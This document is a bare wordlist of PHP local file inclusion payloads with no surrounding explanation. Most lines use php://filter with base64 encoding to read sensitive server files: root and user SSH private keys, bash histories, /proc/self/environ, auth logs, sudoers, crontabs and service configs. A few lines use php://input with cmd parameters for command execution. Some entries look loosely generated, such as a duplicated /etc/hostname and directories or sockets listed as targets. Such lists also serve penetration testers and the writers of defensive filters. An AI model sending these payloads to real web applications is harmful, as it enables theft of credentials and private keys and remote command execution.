php://filter/convert.base64-encode/resource=php://output
php://filter/read=convert.base64-encode/resource=php://temp
php://input?cmd=echo test
php://input?cmd=id
php://filter/convert.base64-encode/resource=file://etc/hostname
php://filter/convert.base64-encode/resource=file://etc/issue
php://filter/convert.base64-encode/resource=file://proc/self/cmdline
php://filter/convert.base64-encode/resource=file://proc/self/status
php://filter/convert.base64-encode/resource=file://proc/self/environ
php://filter/convert.base64-encode/resource=file://./var/log/apache2/access.log
php://filter/convert.base64-encode/resource=file://./var/log/apache2/error.log
php://filter/convert.base64-encode/resource=file://./var/log/nginx/access.log
php://filter/convert.base64-encode/resource=file://./var/log/nginx/error.log
php://filter/convert.base64-encode/resource=file://./var/log/syslog
php://filter/convert.base64-encode/resource=file://./var/log/auth.log
php://filter/convert.base64-encode/resource=file://./var/log/mail.log
php://filter/convert.base64-encode/resource=file://./var/cache/nginx/cache_file
php://filter/convert.base64-encode/resource=file://./var/www/html/index.php
php://filter/convert.base64-encode/resource=file://./var/www/html/admin.php
php://filter/convert.base64-encode/resource=file://./tmp/shell.php
php://filter/convert.base64-encode/resource=file://./var/tmp/shell.php
php://filter/convert.base64-encode/resource=file://./home/user/.bash_history
php://filter/convert.base64-encode/resource=file://./home/user/.ssh/authorized_keys
php://filter/convert.base64-encode/resource=file://./home/user/.ssh/id_rsa
php://filter/convert.base64-encode/resource=file://./root/.bash_history
php://filter/convert.base64-encode/resource=file://./root/.ssh/authorized_keys
php://filter/convert.base64-encode/resource=file://./root/.ssh/id_rsa
php://filter/convert.base64-encode/resource=file://./var/lib/mysql/mysql.sock
php://filter/convert.base64-encode/resource=file://./var/run/mysqld/mysqld.sock
php://filter/convert.base64-encode/resource=file://./var/run/apache2/apache2.sock
php://filter/convert.base64-encode/resource=file://./var/run/nginx.sock
php://filter/convert.base64-encode/resource=file://./dev/random
php://filter/convert.base64-encode/resource=file://./dev/urandom
php://filter/convert.base64-encode/resource=file://./dev/zero
php://filter/convert.base64-encode/resource=file://./var/spool/mail/root
php://filter/convert.base64-encode/resource=file://./var/spool/mail/user
php://filter/convert.base64-encode/resource=file://./home/user/.profile
php://filter/convert.base64-encode/resource=file://./home/user/.bash_profile
php://filter/convert.base64-encode/resource=file://./home/user/.zshrc
php://filter/convert.base64-encode/resource=file://./home/user/.cshrc
php://filter/convert.base64-encode/resource=file://./home/user/.tcshrc
php://filter/convert.base64-encode/resource=file://./root/.profile
php://filter/convert.base64-encode/resource=file://./root/.bash_profile
php://filter/convert.base64-encode/resource=file://./root/.zshrc
php://filter/convert.base64-encode/resource=file://./root/.cshrc
php://filter/convert.base64-encode/resource=file://./root/.tcshrc
php://filter/convert.base64-encode/resource=file://./var/log/mysql.log
php://filter/convert.base64-encode/resource=file://./var/log/postgresql/postgresql.log
php://filter/convert.base64-encode/resource=file://./var/log/mysqld.log
php://filter/convert.base64-encode/resource=file://./etc/mysql/my.cnf
php://filter/convert.base64-encode/resource=file://./etc/postgresql/postgresql.conf
php://filter/convert.base64-encode/resource=file://./etc/nginx/nginx.conf
php://filter/convert.base64-encode/resource=file://./etc/apache2/apache2.conf
php://filter/convert.base64-encode/resource=file://./etc/php.ini
php://filter/convert.base64-encode/resource=file://./etc/redis/redis.conf
php://filter/convert.base64-encode/resource=file://./etc/ssh/sshd_config
php://filter/convert.base64-encode/resource=file://./etc/ssl/openssl.cnf
php://filter/convert.base64-encode/resource=file://./home/user/.vimrc
php://filter/convert.base64-encode/resource=file://./home/user/.emacs
php://filter/convert.base64-encode/resource=file://./home/user/.nano
php://filter/convert.base64-encode/resource=file://./etc/hostname
php://filter/convert.base64-encode/resource=file://./etc/resolv.conf
php://filter/convert.base64-encode/resource=file://./etc/hosts
php://filter/convert.base64-encode/resource=file://./etc/nsswitch.conf
php://filter/convert.base64-encode/resource=file://./etc/network/interfaces
php://filter/convert.base64-encode/resource=file://./etc/ld.so.cache
php://filter/convert.base64-encode/resource=file://./etc/ld.so.conf
php://filter/convert.base64-encode/resource=file://./etc/sysctl.conf
php://filter/convert.base64-encode/resource=file://./etc/crontab
php://filter/convert.base64-encode/resource=file://./etc/crontab.d
php://filter/convert.base64-encode/resource=file://./etc/sudoers
php://filter/convert.base64-encode/resource=file://./etc/sudoers.d
php://filter/convert.base64-encode/resource=file://./etc/rc.local
php://filter/convert.base64-encode/resource=file://./etc/network/if-up.d
php://filter/convert.base64-encode/resource=file://./etc/network/if-down.d
php://filter/convert.base64-encode/resource=file://./etc/init.d
php://filter/convert.base64-encode/resource=file://./etc/systemd/system
php://filter/convert.base64-encode/resource=file://./etc/cron.d
php://filter/convert.base64-encode/resource=file://./etc/cron.daily
php://filter/convert.base64-encode/resource=file://./etc/cron.hourly
php://filter/convert.base64-encode/resource=file://./etc/cron.monthly
php://filter/convert.base64-encode/resource=file://./etc/cron.weekly
php://filter/convert.base64-encode/resource=file://./etc/apt/sources.list
php://filter/convert.base64-encode/resource=file://./etc/apt/apt.conf.d
php://filter/convert.base64-encode/resource=file://./etc/apt/preferences.d
php://filter/convert.base64-encode/resource=file://./etc/apt/sources.list.d
php://filter/convert.base64-encode/resource=file://./etc/apt/keyrings
php://filter/convert.base64-encode/resource=file://./etc/apt/trusted.gpg.d
php://filter/convert.base64-encode/resource=file://./etc/udev/rules.d
php://filter/convert.base64-encode/resource=file://./etc/udev/udev.conf
php://filter/convert.base64-encode/resource=file://./etc/systemd/journald.conf
php://filter/convert.base64-encode/resource=file://./etc/systemd/logind.conf
php://filter/convert.base64-encode/resource=file://./etc/systemd/system.conf
php://filter/convert.base64-encode/resource=file://./etc/systemd/user.conf
php://filter/convert.base64-encode/resource=file://./etc/fstab
php://filter/convert.base64-encode/resource=file://./etc/crypttab
php://filter/convert.base64-encode/resource=file://./etc/mdadm/mdadm.conf
php://filter/convert.base64-encode/resource=file://./etc/hostname
php://filter/convert.base64-encode/resource=file://./etc/localtime
php://filter/convert.base64-encode/resource=file://./etc/timezone